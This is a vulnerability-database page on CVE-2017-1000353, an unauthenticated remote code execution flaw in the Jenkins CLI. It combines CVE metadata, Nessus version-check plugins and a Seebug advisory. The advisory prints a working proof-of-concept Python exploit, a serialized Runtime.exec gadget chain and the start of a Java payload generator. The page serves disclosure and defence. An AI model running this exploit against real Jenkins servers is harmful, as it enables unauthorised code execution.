Vulnerabilities > CVE-2017-1000353 - Deserialization of Untrusted Data vulnerability in multiple products

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
jenkins
oracle
CWE-502
nessus
exploit available

Summary

Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.

Vulnerable Configurations

Part Description Count
Application
Jenkins
1554
Application
Oracle
1

Common Weakness Enumeration (CWE)

Exploit-Db

descriptionCloudBees Jenkins 2.32.1 - Java Deserialization. CVE-2017-1000353. Dos exploit for Java platform. Tags: Denial of Service (DoS)
fileexploits/java/dos/41965.txt
idEDB-ID:41965
last seen2017-05-05
modified2017-05-05
platformjava
port
published2017-05-05
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/41965/
titleCloudBees Jenkins 2.32.1 - Java Deserialization
typedos

Nessus

  • NASL familyCGI abuses
    NASL idJENKINS_2_57.NASL
    descriptionThe version of Jenkins running on the remote web server is prior to 2.57 or is a version of Jenkins LTS prior to 2.46.2, or else it is a version of Jenkins Enterprise that is 1.625.x.y prior to 1.625.24.1, 1.651.x.y prior to 1.651.24.1, 2.7.x.0.y prior to 2.7.24.0.1, or 2.x.y.z prior to 2.46.2.1. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists within core/src/main/java/jenkins/model/Jenkins.java that allows an untrusted serialized Java SignedObject to be transfered to the remoting-based Jenkins CLI and deserialized using a new ObjectInputStream. By using a specially crafted request, an unauthenticated, remote attacker can exploit this issue to bypass existing blacklist protection mechanisms and execute arbitrary code. (CVE-2017-1000353) - A flaw exists in the remoting-based CLI, specifically in the ClientAuthenticationCache.java class, when storing the encrypted username of a successfully authenticated user in a cache file that is used to authenticate further commands. An authenticated, remote attacker who has sufficient permissions to create secrets in Jenkins and download their encrypted values can exploit this issue to impersonate any other Jenkins user on the same instance. (CVE-2017-1000354) - A denial of service vulnerability exists in the XStream library. An authenticated, remote attacker who has sufficient permissions, such as creating or configuring items, views or jobs, can exploit this to crash the Java process by using specially crafted XML content. (CVE-2017-1000355) - Cross-site request forgery (XSRF) vulnerabilities exist within multiple Java classes due to a failure to require multiple steps, explicit confirmation, or a unique token when performing certain sensitive actions. An unauthenticated, remote attacker can exploit these to perform several administrative actions by convincing a user into opening a specially crafted web page. (CVE-2017-1000356) Note that Nessus has not tested for these issues but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id99984
    published2017-05-04
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99984
    titleJenkins < 2.46.2 / 2.57 and Jenkins Enterprise < 1.625.24.1 / 1.651.24.1 / 2.7.24.0.1 / 2.46.2.1 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(99984);
      script_version("1.8");
      script_cvs_date("Date: 2019/11/13");
    
      script_cve_id(
        "CVE-2017-1000353",
        "CVE-2017-1000354",
        "CVE-2017-1000355",
        "CVE-2017-1000356"
      );
      script_bugtraq_id(
        98056,
        98062,
        98065,
        98066
      );
    
      script_name(english:"Jenkins < 2.46.2 / 2.57 and Jenkins Enterprise < 1.625.24.1 / 1.651.24.1 / 2.7.24.0.1 / 2.46.2.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the Jenkins version.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A job scheduling and management system hosted on the remote web server
    is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Jenkins running on the remote web server is prior to
    2.57 or is a version of Jenkins LTS prior to 2.46.2, or else it is
    a version of Jenkins Enterprise that is 1.625.x.y prior to 1.625.24.1,
    1.651.x.y prior to 1.651.24.1, 2.7.x.0.y prior to 2.7.24.0.1, or
    2.x.y.z prior to 2.46.2.1. It is, therefore, affected by multiple
    vulnerabilities :
    
      - A remote code execution vulnerability exists within
        core/src/main/java/jenkins/model/Jenkins.java that
        allows an untrusted serialized Java SignedObject to be
        transfered to the remoting-based Jenkins CLI and
        deserialized using a new ObjectInputStream. By using a
        specially crafted request, an unauthenticated, remote
        attacker can exploit this issue to bypass existing
        blacklist protection mechanisms and execute arbitrary
        code. (CVE-2017-1000353)
    
      - A flaw exists in the remoting-based CLI, specifically in
        the ClientAuthenticationCache.java class, when storing
        the encrypted username of a successfully authenticated
        user in a cache file that is used to authenticate
        further commands. An authenticated, remote attacker who
        has sufficient permissions to create secrets in Jenkins
        and download their encrypted values can exploit this
        issue to impersonate any other Jenkins user on the same
        instance. (CVE-2017-1000354)
    
      - A denial of service vulnerability exists in the XStream
        library. An authenticated, remote attacker who has
        sufficient permissions, such as creating or configuring
        items, views or jobs, can exploit this to crash the Java
        process by using specially crafted XML content.
        (CVE-2017-1000355)
    
      - Cross-site request forgery (XSRF) vulnerabilities exist
        within multiple Java classes due to a failure to require
        multiple steps, explicit confirmation, or a unique token
        when performing certain sensitive actions. An
        unauthenticated, remote attacker can exploit these to
        perform several administrative actions by convincing a
        user into opening a specially crafted web page.
        (CVE-2017-1000356)
    
    Note that Nessus has not tested for these issues but has instead
    relied only on the application's self-reported version number.");
      script_set_attribute(attribute:"see_also", value:"https://www.cloudbees.com/cloudbees-security-advisory-2017-04-26");
      script_set_attribute(attribute:"see_also", value:"https://jenkins.io/security/advisory/2017-04-26/");
      # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9c6d83db");
      script_set_attribute(attribute:"solution", value:
    "Upgrade Jenkins to version 2.57 or later, Jenkins LTS to version
    2.46.2 or later, or Jenkins Enterprise to version 1.625.24.1 /
    1.651.24.1 / 2.7.24.0.1 / 2.46.2.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-1000353");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/13");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/04/26");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/04");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cloudbees:jenkins");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("jenkins_detect.nasl");
      script_require_keys("www/Jenkins");
      script_require_ports("Services/www", 8080);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    port = get_http_port(default:8080);
    get_kb_item_or_exit("www/Jenkins/"+port+"/Installed");
    url = build_url(qs:'/', port:port);
    
    version = '';
    fix = '';
    if (get_kb_item("www/Jenkins/"+port+"/enterprise/Installed"))
    {
      appname = "Jenkins Enterprise by CloudBees";
      version = get_kb_item("www/Jenkins/"+port+"/enterprise/CloudBeesVersion");
    
      if (version =~ "^1\.651\.")
      {
        fix = '1.651.24.1';
      }
      else if (version =~ "^1\.625\." )
      {
        fix = '1.625.24.1';
      }
      else if (version =~ "^2\.7\." )
      {
        fix = '2.7.24.0.1';
      }
      else
      {
        fix = '2.46.2.1';
      }
    }
    else
    {
      if (get_kb_item("www/Jenkins/"+port+"/is_LTS") )
      {
        appname = "Jenkins Open Source LTS";
        fix = '2.46.2';
      }
      else
      {
        appname = "Jenkins Open Source";
        fix = '2.57';
      }
    
      version = get_kb_item("www/Jenkins/" + port + "/JenkinsVersion");
      if (version == 'unknown')
      {
        audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);
      }
    }
    
    if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)
    {
      report =
        '\n  URL           : ' + url +
        '\n  Product       : ' + appname +
        '\n  Version       : ' + version +
        '\n  Fixed version : ' + fix +
        '\n';
    
      security_report_v4(port:port, severity:SECURITY_HOLE, extra:report, xsrf:TRUE);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);
    
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_631C47109BE54A809310EB2847FE24DD.NASL
    descriptionJenkins Security Advisory : DescriptionSECURITY-412 through SECURITY-420 / CVE-2017-1000356 CSRF: Multiple vulnerabilities SECURITY-429 / CVE-2017-1000353 CLI: Unauthenticated remote code execution SECURITY-466 / CVE-2017-1000354 CLI: Login command allowed impersonating any Jenkins user SECURITY-503 / CVE-2017-1000355 XStream: Java crash when trying to instantiate void/Void
    last seen2020-06-01
    modified2020-06-02
    plugin id99698
    published2017-04-27
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99698
    titleFreeBSD : jenkins -- multiple vulnerabilities (631c4710-9be5-4a80-9310-eb2847fe24dd)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(99698);
      script_version("3.5");
      script_cvs_date("Date: 2019/04/10 16:10:17");
    
      script_cve_id("CVE-2017-1000353", "CVE-2017-1000354", "CVE-2017-1000355", "CVE-2017-1000356");
    
      script_name(english:"FreeBSD : jenkins -- multiple vulnerabilities (631c4710-9be5-4a80-9310-eb2847fe24dd)");
      script_summary(english:"Checks for updated packages in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote FreeBSD host is missing one or more security-related
    updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Jenkins Security Advisory : DescriptionSECURITY-412 through
    SECURITY-420 / CVE-2017-1000356 CSRF: Multiple vulnerabilities
    SECURITY-429 / CVE-2017-1000353 CLI: Unauthenticated remote code
    execution SECURITY-466 / CVE-2017-1000354 CLI: Login command allowed
    impersonating any Jenkins user SECURITY-503 / CVE-2017-1000355
    XStream: Java crash when trying to instantiate void/Void"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://jenkins.io/security/advisory/2017-04-26/"
      );
      # https://vuxml.freebsd.org/freebsd/631c4710-9be5-4a80-9310-eb2847fe24dd.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?3062337c"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:jenkins");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:jenkins-lts");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/26");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/04/27");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/27");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"jenkins<2.57")) flag++;
    if (pkg_test(save_report:TRUE, pkg:"jenkins-lts<2.46.2")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    

Seebug

bulletinFamilyexploit
description#### **Vulnerability Summary** The following advisory describes Java deserialization vulnerability found in CloudBees Jenkins version 2.32.1 that leads to a Remote Code Execution. Jenkins helps to automate the non-human part of the whole software development process with now common things like continuous integration and by empowering teams to implement the technical aspects of continuous delivery. It is a server-based system running in a servlet container such as Apache Tomcat. It supports version control tools, including AccuRev, CVS, Subversion, Git, Mercurial, Perforce, Clearcase and RTC, and can execute Apache Ant, Apache Maven and sbt based projects as well as arbitrary shell scripts and Windows batch commands. **Credit** An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. **Vendor Response** CloudBees Jenkins has released patches to address this vulnerability and issued CVE-2017-1000353 for the vulnerability. For more details: [https://jenkins.io/security/advisory/2017-04-26](https://jenkins.io/security/advisory/2017-04-26)/ #### **Vulnerability Details** Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent. The vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands. The first request starts a session for the bi-directional channel and is used for “_downloading_” data from the server. The HTTP header “_Session_” is the identifier for the channel. The HTTP header “_Side_” specifies the “_downloading/uploading_” direction. ![](http://ogb2rw42s.bkt.clouddn.com/images/Jenkins1.jpg) The second request is the sending component of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the “_Session_” HTTP header which is just a UUID. ![](http://ogb2rw42s.bkt.clouddn.com/images/Jenkins2.jpg) All commands sent to the CLI start with a preamble which is often: ``` <===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4= ``` The preamble contains a base64 encoded serialized object. The serialized object of type “Capability” just tells the server which capabilities (e.g. HTTP chunked encoding) the client has. After the preamble and some additional bytes a serialized object of type Command is expected by the Jenkins server. Since Jenkins does not validate the serialized object, any serialize object can be sent. The deserialization is code is in the method “readFrom” of class “Command”: ![](http://ogb2rw42s.bkt.clouddn.com/images/Jenkins3.jpg) The command is called by the “_read()_” of class “_ClassicCommandTransport_”. ![](http://ogb2rw42s.bkt.clouddn.com/images/Jenkins4.jpg) The data coming “_from_” the “_upload_”-side of the channel is read in a thread of type ReaderThread. ![](http://ogb2rw42s.bkt.clouddn.com/images/Jenkins5.jpg) The thread is triggered by the “_upload_”-method which is called in class “_CliEndpointResponse_”. ![](http://ogb2rw42s.bkt.clouddn.com/images/Jenkins6.jpg) In that method the HTTP body data is read and the “notify” method is called to notify the thread. ![](http://ogb2rw42s.bkt.clouddn.com/images/Jenkins7.jpg) **Proof of Concept** In order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script. The second step is to change python script jenkins_poc1.py: * Adjust target url in URL variable * Change file to open in line “FILE_SER = open(“jenkins_poc1.ser”, “rb”).read()” to your payload file. By doing the previous steps, you should see the following massage in the log/stdout of jenkins: ``` Jan 26, 2017 2:22:41 PM hudson.remoting.SynchronousCommandTransport$ReaderThread run SEVERE: I/O error in channel HTTP full-duplex channel a403c455-3b83-4890-b304-ec799bffe582 hudson.remoting.DiagnosedStreamCorruptionException Read back: 0xac 0xed 0x00 0x05 'sr' 0x00 '/org.apache.commons.collections.map.ReferenceMap' 0x15 0x94 0xca 0x03 0x98 'I' 0x08 0xd7 0x03 0x00 0x00 'xpw' 0x11 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 '?@' 0x00 0x00 0x00 0x00 0x00 0x10 'sr' 0x00 '(java.util.concurrent.CopyOnWriteArraySetK' 0xbd 0xd0 0x92 0x90 0x15 'i' 0xd7 0x02 0x00 0x01 'L' 0x00 0x02 'alt' 0x00 '+Ljava/util/concurrent/CopyOnWriteArrayList;xpsr' 0x00 ')java.util.concurrent.CopyOnWriteArrayListx]' 0x9f 0xd5 'F' 0xab 0x90 0xc3 0x03 0x00 0x00 'xpw' 0x04 0x00 0x00 0x00 0x02 'sr' 0x00 '*java.util.concurrent.ConcurrentSkipListSet' 0xdd 0x98 'Py' 0xbd 0xcf 0xf1 '[' 0x02 0x00 0x01 'L' 0x00 0x01 'mt' 0x00 '-Ljava/util/concurrent/ConcurrentNavigableMap;xpsr' 0x00 '*java.util.concurrent.ConcurrentSkipListMap' 0x88 'Fu' 0xae 0x06 0x11 'F' 0xa7 0x03 0x00 0x01 'L' 0x00 0x0a 'comparatort' 0x00 0x16 'Ljava/util/Comparator;xppsr' 0x00 0x1a 'java.security.SignedObject' 0x09 0xff 0xbd 'h*< ' 0xd5 0xff 0x02 0x00 0x03 '[' 0x00 0x07 'contentt' 0x00 0x02 '[B[' 0x00 0x09 'signatureq' 0x00 '~' 0x00 0x0e 'L' 0x00 0x0c 'thealgorithmt' 0x00 0x12 'Ljava/lang/String;xpur' 0x00 0x02 '[B' 0xac 0xf3 0x17 0xf8 0x06 0x08 'T' 0xe0 0x02 0x00 0x00 'xp' 0x00 0x00 0x05 0x01 0xac 0xed 0x00 0x05 'sr' 0x00 0x11 'java.util.HashSet' 0xba 'D' 0x85 0x95 0x96 0xb8 0xb7 '4' 0x03 0x00 0x00 'xpw' 0x0c 0x00 0x00 0x00 0x02 '?@' 0x00 0x00 0x00 0x00 0x00 0x01 'sr' 0x00 '4org.apache.commons.collections.keyvalue.TiedMapEntry' 0x8a 0xad 0xd2 0x9b '9' 0xc1 0x1f 0xdb 0x02 0x00 0x02 'L' 0x00 0x03 'keyt' 0x00 0x12 'Ljava/lang/Object;L' 0x00 0x03 'mapt' 0x00 0x0f 'Ljava/util/Map;xpt' 0x00 0x06 'randomsr' 0x00 '*org.apache.commons.collections.map.LazyMapn' 0xe5 0x94 0x82 0x9e 'y' 0x10 0x94 0x03 0x00 0x01 'L' 0x00 0x07 'factoryt' 0x00 ',Lorg/apache/commons/collections/Transformer;xpsr' 0x00 ':org.apache.commons.collections.functors.ChainedTransformer0' 0xc7 0x97 0xec '(z' 0x97 0x04 0x02 0x00 0x01 '[' 0x00 0x0d 'iTransformerst' 0x00 '-[Lorg/apache/commons/collections/Transformer;xpur' 0x00 '-[Lorg.apache.commons.collections.Transformer;' 0xbd 'V*' 0xf1 0xd8 '4' 0x18 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x05 'sr' 0x00 ';org.apache.commons.collections.functors.ConstantTransformerXv' 0x90 0x11 'A' 0x02 0xb1 0x94 0x02 0x00 0x01 'L' 0x00 0x09 'iConstantq' 0x00 '~' 0x00 0x03 'xpvr' 0x00 0x11 'java.lang.Runtime' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpsr' 0x00 ':org.apache.commons.collections.functors.InvokerTransformer' 0x87 0xe8 0xff 'k{|' 0xce '8' 0x02 0x00 0x03 '[' 0x00 0x05 'iArgst' 0x00 0x13 '[Ljava/lang/Object;L' 0x00 0x0b 'iMethodNamet' 0x00 0x12 'Ljava/lang/String;[' 0x00 0x0b 'iParamTypest' 0x00 0x12 '[Ljava/lang/Class;xpur' 0x00 0x13 '[Ljava.lang.Object;' 0x90 0xce 'X' 0x9f 0x10 's)l' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x02 't' 0x00 0x0a 'getRuntimeur' 0x00 0x12 '[Ljava.lang.Class;' 0xab 0x16 0xd7 0xae 0xcb 0xcd 'Z' 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x00 't' 0x00 0x09 'getMethoduq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.String' 0xa0 0xf0 0xa4 '8z;' 0xb3 'B' 0x02 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x1b 'sq' 0x00 '~' 0x00 0x13 'uq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x02 'puq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x00 't' 0x00 0x06 'invokeuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.Object' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x18 'sq' 0x00 '~' 0x00 0x13 'ur' 0x00 0x13 '[Ljava.lang.String;' 0xad 0xd2 'V' 0xe7 0xe9 0x1d '{G' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 't' 0x00 0x05 'xtermt' 0x00 0x04 'execuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x01 'q' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x0f 'sr' 0x00 0x11 'java.lang.Integer' 0x12 0xe2 0xa0 0xa4 0xf7 0x81 0x87 '8' 0x02 0x00 0x01 'I' 0x00 0x05 'valuexr' 0x00 0x10 'java.lang.Number' 0x86 0xac 0x95 0x1d 0x0b 0x94 0xe0 0x8b 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 'sr' 0x00 0x11 'java.util.HashMap' 0x05 0x07 0xda 0xc1 0xc3 0x16 '`' 0xd1 0x03 0x00 0x02 'F' 0x00 0x0a 'loadFactorI' 0x00 0x09 'thresholdxp?@' 0x00 0x00 0x00 0x00 0x00 0x00 'w' 0x08 0x00 0x00 0x00 0x10 0x00 0x00 0x00 0x00 'xxxuq' 0x00 '~' 0x00 0x11 0x00 0x00 0x00 '/0-' 0x02 0x14 'I:aj' 0x01 0xfe 0xe7 'Kh' 0x98 '-' 0x9c 'o!' 0x05 'H' 0x84 0xfa 0xb1 0x82 0x02 0x15 0x00 0x90 0x0a 0x92 0x0d 'x' 0xa2 '~~' 0xdd 0xba 0xa3 0xe8 0xf6 'x\3' 0xcd 0x98 0x06 '*t' 0x00 0x03 'DSAsr' 0x00 0x11 'java.lang.Boolean' 0xcd ' r' 0x80 0xd5 0x9c 0xfa 0xee 0x02 0x00 0x01 'Z' 0x00 0x05 'valuexp' 0x01 'pxsr' 0x00 '1org.apache.commons.collections.set.ListOrderedSet' 0xfc 0xd3 0x9e 0xf6 0xfa 0x1c 0xed 'S' 0x02 0x00 0x01 'L' 0x00 0x08 'setOrdert' 0x00 0x10 'Ljava/util/List;xr' 0x00 'Corg.apache.commons.collections.set.AbstractSerializableSetDecorator' 0x11 0x0f 0xf4 'k' 0x96 0x17 0x0e 0x1b 0x03 0x00 0x00 'xpsr' 0x00 0x15 'net.sf.json.JSONArray]' 0x01 'To\(r' 0xd2 0x02 0x00 0x02 'Z' 0x00 0x0e 'expandElementsL' 0x00 0x08 'elementsq' 0x00 '~' 0x00 0x18 'xr' 0x00 0x18 'net.sf.json.AbstractJSON' 0xe8 0x8a 0x13 0xf4 0xf6 0x9b '?' 0x82 0x02 0x00 0x00 'xp' 0x00 'sr' 0x00 0x13 'java.util.ArrayListx' 0x81 0xd2 0x1d 0x99 0xc7 'a' 0x9d 0x03 0x00 0x01 'I' 0x00 0x04 'sizexp' 0x00 0x00 0x00 0x01 'w' 0x04 0x00 0x00 0x00 0x01 't' 0x00 0x06 'randomxxsq' 0x00 '~' 0x00 0x1e 0x00 0x00 0x00 0x00 'w' 0x04 0x00 0x00 0x00 0x00 'xxq' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x02 'sq' 0x00 '~' 0x00 0x05 'w' 0x04 0x00 0x00 0x00 0x02 'q' 0x00 '~' 0x00 0x1a 'q' 0x00 '~' 0x00 0x09 'xq' 0x00 '~' 0x00 ' px' Read ahead: at hudson.remoting.FlightRecorderInputStream.analyzeCrash(FlightRecorderInputStream.java:80) at hudson.remoting.ClassicCommandTransport.diagnoseStreamCorruption(ClassicCommandTransport.java:93) at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:75) at hudson.remoting.SynchronousCommandTransport$ReaderThread.run(SynchronousCommandTransport.java:59) Caused by: java.lang.ClassCastException: org.apache.commons.collections.map.ReferenceMap cannot be cast to hudson.remoting.Command at hudson.remoting.Command.readFrom(Command.java:96) at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:70) ``` **jenkins_poc1.py** ``` import urllib import requests import uuid import threading import time import gzip import urllib3 import zlib proxies = { # 'http': 'http://127.0.0.1:8090', # 'https': 'http://127.0.0.1:8090', } URL='http://192.168.18.161:8080/cli' PREAMLE='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' PROTO = '\x00\x00\x00\x00' FILE_SER = open("jenkins_poc1.ser", "rb").read() def download(url, session): headers = {'Side' : 'download'} headers['Content-type'] = 'application/x-www-form-urlencoded' headers['Session'] = session headers['Transfer-Encoding'] = 'chunked' r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True) print r.text def upload(url, session, data): headers = {'Side' : 'upload'} headers['Session'] = session headers['Content-type'] = 'application/octet-stream' headers['Accept-Encoding'] = None r = requests.post(url,data=data,headers=headers,proxies=proxies) def upload_chunked(url,session, data): headers = {'Side' : 'upload'} headers['Session'] = session headers['Content-type'] = 'application/octet-stream' headers['Accept-Encoding']= None headers['Transfer-Encoding'] = 'chunked' headers['Cache-Control'] = 'no-cache' r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies) def null_payload(): yield " " def create_payload(): payload = PREAMLE + PROTO + FILE_SER return payload def create_payload_chunked(): yield PREAMLE yield PROTO yield FILE_SER def main(): print "start" session = str(uuid.uuid4()) t = threading.Thread(target=download, args=(URL, session)) t.start() time.sleep(1) print "pwn" #upload(URL, session, create_payload()) upload_chunked(URL, session, "asdf") if __name__ == "__main__": main() ``` **payload.jar** ``` import java.io.FileOutputStream; import java.io.ObjectOutputStream; import java.io.ObjectStreamException; import java.io.Serializable; import java.lang.reflect.Field; import java.security.KeyPair; import java.security.KeyPairGenerator; import java.security.PrivateKey; import java.security.PublicKey; import java.security.Signature; import java.security.SignedObject; import java.util.Comparator; import java.util.HashMap; import java.util.HashSet; import java.util.Map; import java.util.concurrent.ConcurrentSkipListSet; import java.util.concurrent.CopyOnWriteArraySet; import net.sf.json.JSONArray; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.collection.AbstractCollectionDecorator; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import 